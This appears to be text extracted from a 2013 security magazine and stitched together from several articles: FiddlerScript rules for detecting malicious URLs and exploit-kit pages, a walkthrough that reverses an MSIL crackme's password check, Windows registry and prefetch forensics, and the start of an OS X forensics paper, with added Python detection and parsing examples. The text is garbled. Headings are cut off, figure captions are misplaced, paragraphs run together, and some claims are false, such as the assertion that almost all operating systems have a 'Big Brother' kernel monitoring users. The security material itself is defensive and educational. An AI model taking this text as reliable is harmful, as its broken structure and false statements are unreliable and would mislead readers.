    Fiddler comes with a scripting engine that enables you to write powerful rules coded in JScript.NET. To get started, open the CustomRules.js file from Rules>Customize Rules. I recommend downloading the FiddlerScript Editor and checking out the cookbook page to get more familiar with it (Figure 17).

    The advantage of writing rules is that you can inspect both Requests and Responses and trigger a particular behavior. In essence, Fiddler gives you the power to manipulate them and even fake them.

    I will show you some bits of code that have helped me identify malicious URLs. Once you are comfortable with the syntax and Fiddler's object model, as they say: the sky's the limit.

    Detect a malicious URL based on a string pattern

    static function OnBeforeRequest(oSession: Session) {
        // the string we want to find in every requested URL
        var urlpattern = ":8080/forum/";
        if (oSession.fullUrl.match(urlpattern))
        {
            MessageBox.Show("Bad site identified");
        }
    }

    What does this do?

    The OnBeforeRequest function is called when your browser is about to request a URL from the server. Before that happens, you can hook the event. First, we define a string we want to look for in that URL. Then, as Fiddler makes each request, it checks whether the URL contains that string. oSession is the current session, whose full URL is what the match is performed on.

    Detect if a webpage contains malicious code

    // malware_signatures is an array of strings loaded from a file (see the explanation below)
    static function OnBeforeResponse(oSession: Session) {
        oSession.utilDecodeResponse();   // decompress the body before inspecting it
        for (var i = 0; i < malware_signatures.length; i++)
        {
            if (oSession.GetResponseBodyAsString().match(malware_signatures[i]))
            {
                MessageBox.Show("Malicious code found in " + oSession.fullUrl);
                break;
            }
        }
    }

    The OnBeforeResponse function is triggered when a server sends its response back to the browser. Of course, Fiddler being a proxy, the response first has to go through it before it can reach our client.

    Figure 16. Saving Sessions as a compressed archive with or without password protection

    Figure 15. Export feature in Fiddler

    Figure 14. Saving files captured by Fiddler to the local disk


    As the server's response can be encoded (compressed), we use the utilDecodeResponse method to decode it so it can be read properly. For each Session we loop through our list of malware signatures (they were loaded from a file into an array) looking for a match. We get the Response's content by using the GetResponseBodyAsString method, which essentially places the whole content into a variable. All we have to do next is find a match with one of our signatures.

    Detect a particular file type

    As shown earlier, the Content-Type column in Fiddler will tell you what the file type is. But how do we do this programmatically? Here is an example for detecting a Java applet.

    By looking at the Response headers (Figure 18):

    if (oSession.oResponse.headers.ExistsAndContains("Content-Type", "application/java-archive"))
    {
        MessageBox.Show("Java applet identified");
    }

    Or by using magic-byte detection (magic numbers are the first few bytes of a file, which identify its type):

    if (Utilities.HasMagicBytes(oSession.responseBodyBytes, "PK"))
    {
        MessageBox.Show("Java applet identified");
    }

    Dump a response's body to disk

    Fiddler allows for dumping any web server's Response onto your local disk. You can automate that with a bit of code (fileName is whatever name you choose for the saved file):

    oSession.SaveResponseBody("C:\\Fiddler\\payload\\" + fileName);

    Exploit Kit detection

    Each Exploit Kit has its own characteristics that you can learn to recognize over time. Just like malware, Exploit Kits have certain patterns in their landing pages (specific strings in the URL or in the source code) as well as in the type of exploits they are serving. This is probably the most difficult part of all, as getting such an understanding requires long hours of exposure to exploit code, CVEs, etc.

    Whatever knowledge is gathered can be translated into signatures that in turn can be applied by some of the rules mentioned above, making it possible to collect malicious URLs, gather your own statistics and see changes in the Exploit Kits' release cycle.
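    The rules above run inside Fiddler as JScript.NET. As an added example (not from the article), the Python below applies the same checks offline to captured sessions: the URL string pattern, the signature match on a decoded (gzip) body, the http-equiv=refresh redirect of Figure 8, the Content-Type header check and the PK/MZ magic bytes of Figures 11 and 13. The sessions, the signature list and the .example hostnames are constructed test data.

```python
"""Offline counterparts of the FiddlerScript rules above.

Added example, not from the article. Sessions are dicts {url, headers, body};
the sample sessions, hostnames and signature list are constructed test data.
"""
import gzip
import re

URL_PATTERN = re.compile(r":8080/forum/")          # the string pattern the article's rule looks for
# constructed stand-in for the signature file the article loads into an array
MALWARE_SIGNATURES = [re.compile(s) for s in (r"eval\(unescape\(", r"document\.write\(unescape\(")]
# <meta http-equiv="refresh" content="0;url=..."> as in Figure 8
META_REFRESH = re.compile(
    r'<meta[^>]+http-equiv\s*=\s*["\']?refresh["\']?[^>]*url\s*=\s*["\']?([^"\'>\s]+)', re.I)
MAGIC = {b"PK": "java-archive (ZIP container)", b"MZ": "windows-executable"}


def decode_body(headers, raw):
    """Counterpart of utilDecodeResponse(): undo gzip content encoding before inspection."""
    if headers.get("Content-Encoding", "").lower() == "gzip":
        return gzip.decompress(raw)
    return raw


def classify(session):
    """Return the tags the rules above would raise for one session, in rule order."""
    tags = []
    url, headers = session["url"], session["headers"]
    body = decode_body(headers, session["body"])
    text = body.decode("utf-8", errors="replace")
    if URL_PATTERN.search(url):                                     # OnBeforeRequest rule
        tags.append("bad-url-pattern")
    if any(sig.search(text) for sig in MALWARE_SIGNATURES):         # OnBeforeResponse rule
        tags.append("malicious-code")
    m = META_REFRESH.search(text)                                    # redirect chain (Figure 8)
    if m:
        tags.append("meta-refresh:" + m.group(1))
    if "application/java-archive" in headers.get("Content-Type", "").lower():  # header check
        tags.append("java-archive (Content-Type)")
    for magic, label in MAGIC.items():                               # HasMagicBytes check
        if body.startswith(magic):
            tags.append(label + " (magic bytes)")
    return tags


# Constructed sessions: a gzip-compressed infected page that redirects to a
# landing page, a JAR served with a generic Content-Type, and an executable.
_LANDING_HTML = (
    b'<html><head><meta http-equiv="refresh" content="0;url=http://ek.example:8080/forum/index.php">'
    b'</head><body><script>eval(unescape("%6a%73"))</script></body></html>')
SAMPLE_SESSIONS = [
    {"url": "http://infected-site.example/index.html",
     "headers": {"Content-Type": "text/html", "Content-Encoding": "gzip"},
     "body": gzip.compress(_LANDING_HTML)},
    {"url": "http://ek.example:8080/forum/applet.jar",
     "headers": {"Content-Type": "application/octet-stream"},
     "body": b"PK\x03\x04" + bytes(28)},
    {"url": "http://ek.example:8080/forum/load.exe",
     "headers": {"Content-Type": "application/octet-stream"},
     "body": b"MZ\x90\x00" + bytes(60)},
]


if __name__ == "__main__":
    for s in SAMPLE_SESSIONS:
        print(s["url"], "->", classify(s))
```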

    Jerome Segura
    Jerome Segura is a Senior Security Researcher at Malwarebytes with experience in both client- and server-side malware, with a focus on web exploit research. He has built high-interaction honeyclients to capture drive-by download attacks and has performed hundreds of web server remediations for infected WordPress and Joomla! sites.

    Figure 18. Response Headers showing the type of file sent by the server

    Figure 17. Fiddler2's Script Editor


    On the other hand, interpreted executables are programs that are compiled into intermediate (managed) code, which is a CPU-independent set of instructions. Before intermediate code can be run, it must first be converted to CPU-specific code, usually by a just-in-time (JIT) compiler. Intermediate code can therefore run on any architecture for which a JIT compiler is supplied.

    In this article, we will look at .NET applications compiled into Microsoft Intermediate Language (MSIL). We will be given a simple console application which asks for a valid name/password combination. We will use a specialized disassembler and decompiler to understand the function of the analyzed program. We will also introduce some of the most typical intermediate language instructions.

    After reading this article you should be able to take any MSIL program and start reversing it without problems.

    Prerequisites

    Before you continue reading this article, make sure you have these two tools, ILDASM and ILSpy, downloaded and installed on your computer. Use Google to locate the latest versions of both of the above-mentioned tools. You will also need a simple target program which I programmed just for the purpose of this article. See the attachment for more information.

    What is MSIL?

    MSIL is a kind of stack-based assembly language with additional metadata compiled into the executable. The metadata describe the data types in the code (definitions, information about class members, references) and other data which are needed during execution. All this information (MSIL and metadata) is stored in a PE (portable executable) file. The presence of this information enables the operating system to decide whether MSIL is being executed or not.

    A reverse engineer can recognize whether he is dealing with MSIL or not with a glimpse at the program entry point. A native executable's entry point can contain pretty much anything, but an MSIL executable starts with a jump into the mscoree.dll library (see Figure 1).

    Figure 1. Entry point of MSIL executable

    How To Reverse Engineer .NET fi

    When a reverse engineer wants to analyze an executable program, he usually grabs a specialized piece of software called a debugger, which helps him analyze and trace the parts of the code he is interested in.



    If you open the same application in the List Viewer (in Total Commander) you will see the same as in Figure 2. Notice the MZ and PE signatures at the beginning of the file, which are portable executable signatures. Then there are a few bytes belonging to the MSIL code itself, followed by the BSJB signature, which denotes the beginning of the metadata. In the metadata you can see various human-readable strings like , helloworld.exe, Enter name, Enter password, etc.

    Analyzing an MSIL application in Olly Debugger is possible, but not very convenient, because Olly Debugger is suited to analyzing native code executables, while MSIL is interpreted code. However, other tools were developed to make MSIL analysis easier.
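    The MZ/PE/BSJB check of Figure 2 can be automated. As an added example (not from the article, which uses Total Commander's List Viewer), the Python below parses the PE headers and looks for the CLR runtime header in data directory entry 14, the entry the .NET loader itself relies on, and for the BSJB metadata signature; build_sample_pe() produces a constructed minimal PE32 image so the check runs offline, and the RVA/size values it writes are placeholders.

```python
"""Deciding from the bytes of a PE file whether it carries MSIL.

Added example, not from the article. build_sample_pe() is constructed test
data (DOS header, PE signature, COFF and optional headers, no sections); for a
real binary, pass its bytes to inspect_pe() or is_msil().
"""
import struct

PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B
CLR_RUNTIME_HEADER_INDEX = 14            # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR


def inspect_pe(data):
    """Report which of the signatures Figure 2 shows are present: MZ, PE, CLR header, BSJB."""
    info = {"mz": False, "pe": False, "clr_header": False, "bsjb": False}
    if len(data) < 0x40 or data[:2] != b"MZ":
        return info
    info["mz"] = True
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]       # offset of the PE signature
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return info
    info["pe"] = True
    coff = e_lfanew + 4
    opt = coff + 20                                           # optional header follows the 20-byte COFF header
    if len(data) < opt + 2:
        return info
    size_opt = struct.unpack_from("<H", data, coff + 16)[0]
    magic = struct.unpack_from("<H", data, opt)[0]
    # NumberOfRvaAndSizes and the data-directory table sit at different offsets for PE32 and PE32+
    if magic == PE32_MAGIC:
        n_off, dir_off = 92, 96
    elif magic == PE32PLUS_MAGIC:
        n_off, dir_off = 108, 112
    else:
        return info
    if len(data) < opt + dir_off:
        return info
    n_dirs = struct.unpack_from("<I", data, opt + n_off)[0]
    entry = opt + dir_off + 8 * CLR_RUNTIME_HEADER_INDEX
    if n_dirs > CLR_RUNTIME_HEADER_INDEX and size_opt >= entry + 8 - opt and len(data) >= entry + 8:
        rva, size = struct.unpack_from("<II", data, entry)
        info["clr_header"] = rva != 0 and size != 0           # non-empty entry = managed image
    info["bsjb"] = b"BSJB" in data                            # metadata root signature
    return info


def is_msil(data):
    """A PE file is MSIL when it has a CLR runtime header (or, failing that, BSJB metadata)."""
    i = inspect_pe(data)
    return i["pe"] and (i["clr_header"] or i["bsjb"])


def build_sample_pe(managed):
    """Constructed minimal PE32 image; managed=True fills directory 14 and appends a BSJB marker."""
    e_lfanew = 0x40
    dos = b"MZ" + bytes(0x3A) + struct.pack("<I", e_lfanew)
    # Machine i386, 0 sections, no timestamp/symbols, 224-byte optional header, EXE|32BIT
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<I", opt, 92, 16)                       # NumberOfRvaAndSizes
    tail = b""
    if managed:
        # placeholder RVA/size for the CLR header (real values depend on the section layout)
        struct.pack_into("<II", opt, 96 + 8 * CLR_RUNTIME_HEADER_INDEX, 0x2008, 72)
        tail = b"BSJB" + b"\x01\x00\x01\x00"                   # constructed metadata-root marker
    return dos + b"PE\0\0" + coff + bytes(opt) + tail


if __name__ == "__main__":
    for managed in (True, False):
        print("managed" if managed else "native", inspect_pe(build_sample_pe(managed)))
```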

    Introduction to ILDASM

    The most basic and lowest-level application for analyzing Intermediate Language (IL) is a program called ILDasm (Intermediate Language Disassembler). When you open ILDasm and drag and drop onto it the application you want to analyze, you will see something like Figure 3.

    Figure 2. View of the binary form of application

    Figure 3. Application opened in ILDasm

    Figure 4. Disassembly of the Main method, part 1

    After clicking on Main:void(string[]), you can see the disassembly of the Main method of class helloworld, see Figure 4 and Figure 5.

    Let's look at the disassembled instructions and try to guess their purpose. At first glance you can see that MSIL is a completely different assembly language compared to standard x86 assembler.

    The first instruction is NOP, No-OPeration: it does nothing. BR.S is a BRanch instruction, i.e. a jump; S means short form (short distance from the location of the instruction to the jump target). LDSTR means LoaD STRing (here: Enter name), CALL calls a system function (here: WriteLine). STLOC.0 (STore LOCal) pops a value from the stack into the local variable with index 0 (see .locals init in Figure 4 for all local variables of the current procedure). In our example, ReadLine() waits for user input; this input is stored on top of the stack and later popped into a local variable. LDC.I4.0 is LoaD Constant as a 4-byte integer, its value is 0. ADD.OVF adds signed integers with overflow check. Remember that all operands are taken from the stack and the results are always pushed onto the stack too; there are no general-purpose registers as you might know from the x86 Intel architecture. The ADD.OVF instruction takes two values from the stack, computes the result and stores it on top of the stack.

    Notice the instructions from IL_002D to IL_0036. The get_Chars system call gets a character from the string in loc.0 (the name was previously stored there); the index of the character is now 0 (0 was stored in loc.3). The result is stored on top of the stack and then add.ovf adds this result to ldloc.2 (which was initially 0), and this new result is stored back by the instruction stloc.2.

    Similarly, in the instructions from IL_0038 to IL_003B, loc.3 is incremented by 1 and the result is stored back into loc.3. Then this counter (loc.3) is compared to the length of the name at IL_0043. CLT means Compare Less Than: it pushes 1 if value1 < value2, else it pushes 0. If the counter is less than the length of the name, the code jumps to IL_002C (at IL_0049) and the whole process repeats. In short, this loop sums up all the characters in the entered name.

    Now look at the code from IL_004B to IL_005B. The user-entered password (stored in loc.1) is converted from string to int32 (System.Convert::ToInt32 at IL_004D) and the result of the conversion is pushed on top of the stack. Then it is compared by CEQ (Compare EQual) with ldloc.2, the temporary variable which stores the result of the loop that summed all the characters of the user-entered name. CEQ, similar to CLT, pushes 1 (of type int32) if value1 equals value2, else it pushes 0. In our case, if the user-entered and program-computed integers are the same, CEQ pushes 1; ldc.i4.0 at IL_0054 pushes 0; these are not equal, so the jump BRTRUE.S IL_0072 at IL_005B is not taken and the success message is displayed correctly. Then the program jumps to IL_0078 (from IL_0070) and the application ends.

    Figure 5. Disassembly of the Main method, part 2

    In C, I would write the algorithm as follows:

    #include <string.h>
    void compute(char *name)
    {
        int result = 0;
        for (int i = 0; i < strlen(name); i++)
            result += name[i];   /* sum every character of the name, as the IL loop does */
        /* the program then compares result with the integer typed as the password */
    }


    ILSpy, because it is free and it is great to work with. Another alternative may be Reflector.NET. First of all, run ILSpy and drag and drop onto it the program you want to analyze. You can see it in Figure 7.

    In the left column you can see many system classes and, among them, our helloworld class. When you click on the helloworld class, click the (+) signs until you get to the Main method; then in the right column you can see the decompiled procedure Main in C#. Now it looks much better and is much easier to read and understand. We basically got the original source code, from which we can easily verify the observations made during our analysis with ILDasm. If you want to see the low-level IL code, you can choose IL from the dropdown menu (see Figure 8, the text field with C# just below the menu item Help).

    Conclusion

    We got the basic skills in reversing MSIL. We can distinguish whether a PE executable file is MSIL or not by simply looking at its binary representation. We learnt to use the ILDasm and ILSpy tools, and we got in touch with IL assembly instructions.

    Jaromir Horejsi
    Jaromir is a computer virus researcher and analyst. He specializes in reverse engineering and analyzing malicious PE files on the Windows platform. He is interested in malware internals: how it is packed/crypted, how it is installed on the computer, how it protects itself from being analyzed, etc. He also likes to solve interesting crackmes. Apart from reverse engineering, his hobbies include traveling, exploring new places, flying remote control models and playing board games.

    Figure 8. Main method decompiled with ILSpy


    The focus of the research study has been on four topics, which are as follows: forensic analysis of the Windows registry, forensic analysis of prefetch, forensic analysis of data, and uses of forensic tools.

    Computer forensics is a long-used technology that is gaining more widespread use and popularity within the IT community. It involves many things, including gathering evidence of cyber crime, hacking activities and insider fraud.

    The most widely used operating system is Microsoft's Windows, but at the same time it happens to be the most exploited and vulnerable to attacks. It is a known fact that almost all operating systems consist of a "Big Brother" kernel that is responsible for monitoring the activities of the user; third-party tools can also be used for monitoring user activity. The usual procedure for Windows computer forensics is briefly discussed below.

    Forensic Analysis of Windows Registry

    The Registry is one of the main parts of Windows. It is a hierarchical database, also known as the configuration database of Microsoft Windows. It stores the configuration data of every Windows program, such as MS Office, Adobe Reader etc., in the registry. It replaces most text-based configuration files used in earlier versions of Windows operating systems, such as .ini files and config.sys.

    The Windows registry can be opened by typing regedit in the Run dialog. It can be seen as one unified file system. The left-hand panel, also known as the key panel, is an organized listing of what appear to be folders.

    The many types of data you can find in the registry are described in this list:

    PASSWORD INFORMATION
    STARTUP APPLICATION

    Figure 1. An unread email

    Introduction to Microsoft Windows Forensics

    Interest in computer forensics has increased in the last couple of years. This happened because criminals have moved to the digital world, using computers and computer networks to commit crimes. This article has been written to give an introduction to the world of computer forensics and explain how to apply it to Windows computers.



    STORAGE DEVICE HARDWARE
    INTERNET INFORMATION
    WIRELESS NETWORK
    UNREAD EMAIL

    The importance of the Registry

    The Registry is the soul of the Microsoft Windows operating system; due to the vast amount of information stored in it, the registry can be an excellent source of potential evidential data.

    Registry Keys of Forensic value

    HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU
    MRU is the abbreviation for most recently used. The * subkey contains the full file paths of the 10 most recently opened/saved files. This key maintains a list of recently opened or saved files like .txt, .pdf, .ppt etc.

    HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU
    This key correlates with the OpenSaveMRU key to provide extra information. Each binary value under this key contains the file name of the program used to open or save a file and the folder path of that file.

    HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs
    This key corresponds to %UserProfile%\Recent (My Recent Documents). It maintains a list of files recently executed or opened through Windows Explorer, and contains both local and network files that were recently opened.

    HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
    The MRUList value maintains a list of letters which refer to the respective values. This key maintains a list of entries executed using the Start > Run command. The letters are arranged according to the order in which the entries were added.

    Forensic Analysis of Prefetch

    Prefetch files, a core part of the Windows operating system, were introduced in Windows XP and are designed to speed up the application startup process. A prefetch file contains the name of the executable and a timestamp indicating the last time the program was run. Although prefetching is present in Windows 2003, by default it is only enabled for boot prefetching. The feature is also found in Windows Vista, where it has been augmented with SuperFetch and ReadyBoot.

    Up to 128 prefetch files are stored in the %SystemRoot%\Prefetch directory. Each file in that directory should contain the name of the application followed by an eight-character hash of the location from which it was run.

    Signature of Prefetch File

    Each prefetch file has a signature in the first 8 bytes of the file: a 4-byte format version followed by the ASCII string SCCA.

    Windows XP and Windows 2003 prefetch files start with version 0x11, i.e. the bytes 11 00 00 00 53 43 43 41 (0x00000011, then SCCA).

    Windows Vista and Windows 7 prefetch files start with version 0x17, i.e. the bytes 17 00 00 00 53 43 43 41 (0x00000017, then SCCA).

    Time Stamps of Prefetch File

    The creation date of the file indicates the last time the application was executed. Both the NTFS timestamps of a prefetch file and the timestamp embedded in each prefetch file contain valuable information.

    Creation Time of Prefetch File

    The creation time does not have a static offset on any Windows platform. The location of the creation time can be found using the offset 0x8 + length of volume path offset.

    Last Run Time

    A timestamp of when the application was last run is embedded in the prefetch file: at offset 0x78 on Windows XP and Windows 2003, and at offset 0x80 on Windows Vista and 7 (Figure 2).
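    As an added example (not from the article), here is a parser for exactly the header fields described above: the version and SCCA signature in the first 8 bytes, the last-run FILETIME at 0x78 (XP/2003) or 0x80 (Vista/7), and the APP.EXE-XXXXXXXX.pf file name. The prefetch images it reads are constructed test data (build_sample() writes only those fields), and the file name used in the demo is made up.

```python
"""Parsing the prefetch header fields the section above describes.

Added example, not part of the article. build_sample() constructs a minimal
prefetch header (version, SCCA, zero padding, last-run FILETIME) as test data;
on a real system, pass the bytes of a file from %SystemRoot%\\Prefetch.
"""
import struct
from datetime import datetime, timedelta, timezone

PREFETCH_SIGNATURE = b"SCCA"
# format version in bytes 0-3 -> (Windows family, offset of the last-run FILETIME)
VERSIONS = {0x11: ("Windows XP / 2003", 0x78), 0x17: ("Windows Vista / 7", 0x80)}
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft):
    """A FILETIME counts 100-nanosecond intervals since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def parse_prefetch(data, filename=""):
    """Return version, Windows family, last-run time and (if a name is given) the exe and path hash."""
    if len(data) < 8 or data[4:8] != PREFETCH_SIGNATURE:
        raise ValueError("not a prefetch file: SCCA signature missing at offset 4")
    version = struct.unpack_from("<I", data, 0)[0]
    if version not in VERSIONS:
        raise ValueError(f"unsupported prefetch version 0x{version:x}")
    family, ts_off = VERSIONS[version]
    if len(data) < ts_off + 8:
        raise ValueError("file truncated before the last-run timestamp")
    last_run = struct.unpack_from("<Q", data, ts_off)[0]
    info = {"version": version, "windows": family, "last_run": filetime_to_datetime(last_run)}
    if filename:
        # APP.EXE-XXXXXXXX.pf: executable name, then the 8-character hash of the run location
        stem = filename[:-3] if filename.lower().endswith(".pf") else filename
        exe, _, path_hash = stem.rpartition("-")
        info["executable"], info["path_hash"] = exe, path_hash
    return info


def build_sample(version, last_run):
    """Constructed prefetch header with the given version and last-run time (UTC datetime)."""
    ts_off = VERSIONS[version][1]
    ft = ((last_run - FILETIME_EPOCH) // timedelta(microseconds=1)) * 10
    buf = bytearray(ts_off + 8)
    struct.pack_into("<I", buf, 0, version)
    buf[4:8] = PREFETCH_SIGNATURE
    struct.pack_into("<Q", buf, ts_off, ft)
    return bytes(buf)


if __name__ == "__main__":
    when = datetime(2013, 1, 15, 10, 30, tzinfo=timezone.utc)
    for ver in VERSIONS:
        print(parse_prefetch(build_sample(ver, when), "HELLOWORLD.EXE-12345678.pf"))
```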

    Figure 2. Last Run Time


    Forensic Analysis of Data

    There are two types of data, which are as follows:

    HOST DATA
    META DATA

    Host Data

    Host data includes information about components such as the operating system and applications. Use the following procedure to analyze the copy of the host data you obtained in the acquire-the-data phase.

    Identify what you are looking for. There will likely be a large amount of host data, so you should try to create search criteria for events of interest. For example, you can use the Microsoft Windows Sysinternals Strings tool to search the files located in the \Windows\Prefetch folder. This folder contains information such as when and where applications were launched.

    Examine the operating system data, including clock drift information and anything loaded into the host computer's memory, to see if you can determine whether any malicious applications or processes are running or scheduled to run. For example, you can use the Windows Sysinternals Autoruns tool to show you what programs are configured to run during the boot process or at login.

    Meta DataThe Documents are arguably one of the most im-portant areas where Metadata is found. It is no un-derstatement to say that in addition to attorneys wanting to find the metadata to prove who wrote the memorandum. The following list describes the basic types of meta-data found in a typical word processing documents:

    Author Organization Revisions Previsions Authors Computer Name Hard disk Visual Basic Objects

    You can find metadata in Adobe pdf files, Multime-dia files, web pages, databases and even geograph-ic software applications. Although Microsoft is the focus of much of the metadata extraction, metadata can be found in almost all application software.

    The issue has reached such proportions that Mi-crosoft has published methods to remove meta-data from its documents for organization that feel they need to wipe their documents clean.

    It is located within the documents falls into two distinct areas. Viewable by the user and not view-able by the user. If you cant view information you have to extract it.

    viewing MetadataThe list describes the information you can find when you are looking at user viewable metadata.

    Document StatisticsStatistical information thats often useful to deter-mine timeline and corroborate where about is also often found in the properties dialog box depending on which tab you choose (Figure 3).

    Extracting MetadataEXTRACTING METADATA is also a process of ex-tracting the information from the metadata comed under the process of forensic analysis.

When you are extracting metadata, you have to use special software tools such as Metadata Analyzer or iScrub to extract the data that you can't easily see. These tools can analyze the document at a binary level and can reveal deleted text that might still be present in the document. Figure 4 shows the information that Metadata Analyzer can extract.

    Figure 3. Properties

    Figure 4. Metadata analyzer
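As an added illustration of the extraction step, not code from the article or from Metadata Analyzer, the following Python reads the user-viewable properties (author, organization, revision count, last editor, timestamps) from the docProps parts of an Office Open XML document; the sample document and its property values are constructed inline for the demo.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# Namespaces used by the two property parts of an Office Open XML package.
NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
    "dcterms": "http://purl.org/dc/terms/",
    "ep": "http://schemas.openxmlformats.org/officeDocument/2006/extended-properties",
}

# core.xml carries who and when; app.xml carries organization, template and edit time.
FIELDS = {
    "docProps/core.xml": {
        "author": "dc:creator", "last_modified_by": "cp:lastModifiedBy",
        "revision": "cp:revision", "created": "dcterms:created",
        "modified": "dcterms:modified",
    },
    "docProps/app.xml": {
        "organization": "ep:Company", "application": "ep:Application",
        "template": "ep:Template", "total_edit_time_min": "ep:TotalTime",
    },
}

def extract_docx_metadata(data: bytes) -> dict:
    """Return the user-viewable properties of a docx/xlsx/pptx given as bytes.
    A non-zip file yields an "error" key and an absent part or field yields None,
    so a batch run over an evidence set does not stop on the first odd file."""
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return {"error": "not a zip container (not OOXML, or corrupted)"}
    found = {}
    for part, wanted in FIELDS.items():
        try:
            root = ET.fromstring(archive.read(part))
        except KeyError:                       # part missing from the package
            found.update({name: None for name in wanted})
            continue
        for name, path in wanted.items():
            node = root.find(path, NS)
            found[name] = node.text if node is not None else None
    return found

def metadata_findings(meta: dict) -> list:
    """Points an examiner would note: a second editor, or a long save history."""
    notes = []
    author, editor, rev = meta.get("author"), meta.get("last_modified_by"), meta.get("revision")
    if editor and editor != author:
        notes.append("last saved by %s, not the original author %s" % (editor, author))
    if rev and rev.isdigit() and int(rev) > 1:
        notes.append("document went through %s saved revisions" % rev)
    return notes

def build_sample_docx() -> bytes:
    """Constructed minimal package for the demo; not a real evidence file."""
    core = (
        '<cp:coreProperties xmlns:cp="%s" xmlns:dc="%s" xmlns:dcterms="%s">'
        "<dc:creator>A. Writer</dc:creator><cp:lastModifiedBy>B. Editor</cp:lastModifiedBy>"
        "<cp:revision>7</cp:revision><dcterms:created>2012-11-02T09:15:00Z</dcterms:created>"
        "<dcterms:modified>2012-12-20T17:42:00Z</dcterms:modified></cp:coreProperties>"
    ) % (NS["cp"], NS["dc"], NS["dcterms"])
    app = (
        '<Properties xmlns="%s"><Application>Microsoft Office Word</Application>'
        "<Company>Example Corp</Company><Template>Normal.dotm</Template>"
        "<TotalTime>95</TotalTime></Properties>"
    ) % NS["ep"]
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("docProps/core.xml", core)
        z.writestr("docProps/app.xml", app)
        z.writestr("word/document.xml", "<document/>")
    return buf.getvalue()
```

Pointing extract_docx_metadata at the bytes of a real .docx from an evidence set gives the same dictionary; the legacy binary .doc format stores its properties differently and needs a separate parser.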

www.hakin9.org/en

Forensic Tools for Microsoft Windows

There are many forensic tools available on the Internet. Today we discuss some of the important tools most used in our investigations, which are as follows:

EnCase 4: EnCase 4 is a complete forensic toolkit that covers much of the work that forensic analysts carry out.

FTK: The AccessData Forensic Toolkit is another complete forensic toolkit. FTK is recognized as one of the leading forensic tools for performing email analysis.

Paraben Case Agent Companion: Paraben's Case Agent Companion is designed to optimize the work of the agent working the case. It has built-in viewers for over 225 file formats and is compatible with Paraben's P2.

WinHex: WinHex is a universal hexadecimal editor. It is often used in forensic examinations.

Conclusion

This article provides a technical introduction and overview of computer forensic procedure. I attempted to cover the fundamental aspects of computer forensics in Microsoft Windows, from acquiring and verifying the evidence through a complete logical and physical analysis.

Given the popularity of the Windows operating system, it is important for computer forensic experts to understand its complexity. The information and potential evidence that exist in Microsoft Windows make it a significant forensic resource.

Akshay Bharganwar

Akshay started his career in the computer field at the age of 7 and his career in ethical hacking at the age of 17. He was trained by Mr Ankit Fadia. After that he worked as an independent ethical hacker. He delivers speeches about cyber security to government organisations and has solved many cases of cyber crimes in Nagpur and outside Nagpur. Currently he is working with three organisations in the security field, i.e. Indian Cyber Army, Hans Anti-Hacking Society and International Cyber Threat Task Force.

01/2013 32

Digital Forensics on the Apple OS X Platform

Forensic studies on the OS X and Apple Macintosh family of computers have previously focused on low-level details of the filesystem or specific applications. This article attempts to look at the forensic process from the perspective of the field examiner when encountering an OS X 10.4 or greater system using EFI-based firmware. Whether a fixed desktop or a mobile device is running this operating system, techniques are covered which would allow image acquisition of the target system while capturing volatile data and still preserving the original evidence. Application-level analysis after image acquisition is also discussed.

The goal of this paper is to provide an overview of forensics techniques that can be used against a target system running Apple's OS X operating system. Although a few papers have been written regarding this topic, they mostly consider techniques for acquiring an image on a powered-off system only. These techniques will be covered, but other considerations, such as responding to a situation where the system is logged in and/or powered on, will be considered also. Other non-Apple devices, such as virtual machines, modified Apple TV devices, or Hackintosh-type clones, are not specifically addressed, but some techniques can work on these systems also. There are some topics that will not be covered, such as Apple systems running an operating system older than OS X 10.4, and the underlying data structures of HFS and other native filesystems. Additionally, this paper will not discuss techniques for incident response not related to forensics. For example, topics such as uncovering malware or suspicious network activity will not be included.

Before you arrive on the scene of an alleged crime, or any situation that calls for a forensic analysis, you should have a proper toolkit prepared for performing field analysis and acquisition. Most examiners focus on tools geared for Windows operating systems, and also do not take into consideration trying to capture any live data from a system that is not unlocked. By assembling a minimum set of hardware and software tools that are field ready, an examiner can easily be prepared for these types of situation. Also, it is a good idea to have a more extensive set of tools at a fixed lab site, allowing for more thorough investigation. These tools will be covered in more detail later, but initially you would want the following items to be part of your field kit:

- Apple PowerBook laptop (running 10.7 Lion or later)
- Windows 7 laptop
- FireWire cable
- Forensics software (installed and on live CD/DVD)
- Digital still/video camera

(List: Items needed for an OS X forensics kit)

One question that might be asked is what to do when first encountering a system that is clearly an Apple laptop or desktop of some sort. The same approach should be taken as with any other system, and the most volatile data should be captured first if possible. Also, remember that in any situation that calls for a forensic analysis, full documentation should be kept regarding the chain of custody for any systems or media that are collected. If the target system is running and logged on, the examiner should make sure to move the mouse or pointer device to prevent it from enabling the screen saver and locking the screen. As with any potential crime scene, care should be taken not to disturb any evidence or change the focus of the desktop to another window. Simply moving the mouse back and forth without clicking should accomplish this, although it is easy to mistakenly apply too much pressure to the built-in trackpad on some laptops, which will cause a click to occur. The examiner can then take pictures of the device as is, and depending on the circumstances or specific situation, programs can be run to acquire memory, check open windows, or disable encryption.

Obviously, the trade-off would be that if the system is interacted with at all, there would need to be some sort of hash-like state captured prior to interaction. It might be possible to capture everything on video for this. Since it will be rare to find a system in such a state, there are other, and actually better, options than exist with some Windows or other Unix-based systems, assuming that the device is FireWire capable.

